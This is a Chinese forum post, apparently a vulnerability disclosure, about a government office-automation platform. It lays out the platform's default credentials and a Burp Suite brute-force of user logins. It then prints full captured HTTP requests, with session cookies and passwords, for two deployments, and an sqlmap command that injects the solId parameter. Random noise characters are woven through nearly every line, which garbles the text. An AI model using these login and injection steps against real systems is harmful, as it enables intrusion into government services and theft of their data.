|
$ m, b5 U/ e- L8 r1 i
8 y7 Z7 U- {% s1 K2 F5 K3 N7 n: `
9 L+ j; @% m. _% `+ G- R
$ X: x& h* c0 x% X 平台简介:
1 ^; W) q( V( @) Z8 `. X
& j+ ^. q$ o0 V4 P8 A3 Z; P, \- |
% @) x0 {! P- K5 @3 @
3 \$ B+ t, {0 ]0 V/ @! ~4 d , R; r/ _" v/ @% `9 P' A* _3 ]
3 N3 [. o& o9 U7 T; w% c# k+ A 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 + A3 f* l/ R9 `$ D5 ]9 M. z
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 $ g1 D; X! k X2 l
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!* G3 {3 H- ]# _- h9 A/ U
" a/ B' e- i8 Z! w! s5 x4 |: o+ I6 A! x2 y. T6 b
9 S9 m4 B Q# t + O q1 l7 e& Q. I
4 M. i" E6 Q, _( N5 |( ^% V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
, ?( e3 d- B+ ~3 y! u. u5 W 7 e$ \# N* j7 H, F0 ~' i( o4 c
+ \4 s4 T0 B" c2 k5 k# S
, @4 \ A7 c1 i0 K5 ^/ ? % e' o0 w) e" d- t/ J7 l- C" n! d
6 ^0 k+ g7 ~! B* D5 U
http://1.1.1.1:7197/cap-aco/#(案例2-) y3 q; J8 ]- Y. B& F/ f; E8 N
* p1 [' h0 C6 ]0 g$ h) W1 f8 ^
0 s9 V8 q1 o; Z1 O http://www.XXOO.com (案例1-官网网站)- o2 a% J; M; @8 E/ I. p6 P! q
1 a& l3 h3 h& T9 o$ l
( g2 {. d. q3 ]# Q5 U f8 h
& L: z* ~7 A u$ e* J# }
2 F1 D% M( K! C L- h% A! t; B3 A9 K% ~: h8 a4 d5 C
漏洞详情:
/ t3 `4 S# \: j- j' n8 _
. V# `, e: G! w2 w. C+ Q- y
2 L. f6 K4 M; v! c8 D: ?4 U% ~ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试% d3 y+ r8 k1 B
" Q7 f% F$ Z* m
( r: u$ o3 O7 q/ U4 K 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:. b6 U. u5 \- Q) @$ v
) s% K+ r7 V- C D5 k
, J+ @& a$ Z( Z9 r/ s 1 `6 F" c1 W4 y+ ~
% S. U4 W* r9 |
q- t. ~8 x& K ; N) E0 @( D/ n7 i6 U( i9 @
4 [; c$ o/ F! P# |2 t% z: T
0 V8 J% }, m2 j. A9 R status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
! O4 H5 x% J- p$ |* G
+ D6 w- N- M# o6 M3 U7 q7 |& X7 G- w5 X+ W0 N
1、案例1-官方网站
" B6 ~4 c% Z( `3 v3 q5 B3 c2 N
# k1 T& I! P0 [, E0 G: J% Q
3 w4 [9 l; M! I; e4 B' P GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
! O& a' I$ R5 M- l8 V
9 q- Q1 m7 c1 i/ d5 b& ]5 J5 I
, f0 m$ S b/ B8 [. h4 j' Z- z Host: www.XXOO.com
% r& a- e% C9 I1 x% R6 Y9 B
6 h# J+ Y6 Z, |: r0 l! f/ s3 h( d
. i% A# k2 v, T% V Proxy-Connection: Keep-Alive
' u: x. U* N- b: B! v1 Z f 7 L' d6 G. f( t. X: H7 B
- |, I' l3 {( l
Accept: application/json, text/javascript, */*; q=0.01( s( k8 }* k9 x
- t# G- G4 U$ L# A, @) v. r
0 m( {3 V7 J. ]9 R$ g Accept-Language: zh-CN0 Q* f2 T Y- i) S. f2 {
^. F( ~4 ], ^; m& {. }
$ w3 C y. I- h9 \6 P& \. \( D# \
Content-Type: application/json
! Y* [7 I$ }% _1 ^
- s* y& a( S; N) e+ L5 Y. n! A: q
! j2 L9 I& k! |, T' ~ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 z0 Y5 T, A" v" q
" b7 _+ H1 U' T% T
- Z5 I# D' x: m4 _6 u5 |$ f X-Requested-With: XMLHttpRequest& P7 i3 i& _0 K; U0 d: P2 i5 d
( ~1 {+ L& c; E7 E% y
( k# T! X% I+ f. J Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002+ C% {" C7 E7 O+ M' s3 N
2 Y! y- B; c; V/ O7 i! K# A3 I: c% D
* N' W8 X' d. t) ~1 M& l Accept-Encoding: gzip, deflate, sdch2 A) K( F2 Q9 B. c/ i
! J( z2 K5 r, a/ ~+ `. P1 b* Q
6 D% b& \2 {3 K5 x Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
/ L0 l( g2 e" j( h/ E% N& @
: Q- U ~% h% f9 t' S C5 f! l$ x7 p$ x U& m N" b( r6 A
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 O( P! w3 L% l
" y# {' x+ `2 ^* I6 s5 o5 E$ w2 H' X; m% Y- O
3 ]0 a" D1 f! m8 Z0 ] G
4 P% A) c) {- V
( @+ W- D9 _4 D# x# a
, p5 ~ ?) E! h$ p/ r9 N. j
. S: I) q& R5 i
6 Q$ y- Q, }4 i- t( o8 I
5 f$ ?% J$ n$ K. _6 t, }
' c. a% v! L3 B7 k
: X2 p6 b4 T2 A9 [, m- B- ]8 ]
+ A4 B) w& A% H- W- R
% @ J0 k6 k' j# b" j
0 A. G1 f: F0 m - i! b7 h* ~) { L# ~) `
3 i9 a9 w) X# e6 T. `" L6 R
+ g) }% K3 z/ x f' f9 j
2、案例2-某天河云平台
$ ~3 w/ f g* i4 t
3 ?/ j i8 z2 S
# ~4 o* ^$ }* U1 w9 i) x6 R GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ o" [, t s' r$ ]1 d/ q3 l
: ~) }& [" ?" F4 b+ R( d6 j7 I; r h! t; r- j
Host: 1.1.1.:71973 C+ W, j) F/ ]9 V% `' E) j' j, U
, P" {/ Q g* w) E4 e2 d
6 s5 a& z) u- |6 T5 ~
Accept: application/json, text/javascript, */*; q=0.01
0 ~. F: r% ]( m; K
5 P) u% b! E) o! ~8 L
- Y: o2 z; ~ N2 j* D% [1 P- i4 C X-Requested-With: XMLHttpRequest- Q1 m* y3 @4 [1 v+ j
1 n' k: G0 b" U- U/ k+ `" l% u
; E) J( I7 }# z8 X) i9 v4 q7 z' r
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0% b( F3 L/ i; @4 [; F2 v
5 X7 q. P, Y+ j; }
; E# g/ w s! t' ]$ t( o/ G+ E Content-Type: application/json
7 P, d& `" Q: I7 P0 Y& h: |
+ K/ u ^4 O0 i6 K
/ ]( Y- f e, c b8 M1 Z1 B Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
# \9 ~% h- E/ O3 J, } + Z+ x) E: O1 U2 f y/ E" Q" d
' t, o0 D& J, e j( w6 G* H/ G& [ Accept-Language: zh-CN,zh;q=0.8% W" C* s1 `4 H0 L( j8 l
& i0 o$ N: }+ D6 U. k' ]
7 w& ]2 L/ r) @% N1 Y u9 u" A3 F; b
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
" I# U5 A) W5 G% z( m3 w5 }- n* t
3 ?! Z3 K+ Q/ E4 j, N B5 f8 x4 \3 ]3 w' j5 g
Connection: close y, O0 I2 F6 }- }* Z: j! a
; E& w5 `) D- D- _7 M) e2 ^) E9 d9 J# c
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 E K2 l; Z1 u, N, r; l( R
- K& {6 O( a# i1 k: S9 K$ C; i% T# q1 e. B8 J W& N
/ y/ m/ d. b W- Y% w* K z
! @2 K7 M4 x K' [# } s) b5 A$ [7 S, y/ i4 \0 o& n) F2 _
5 T, ^5 j; A7 H4 n/ r# z |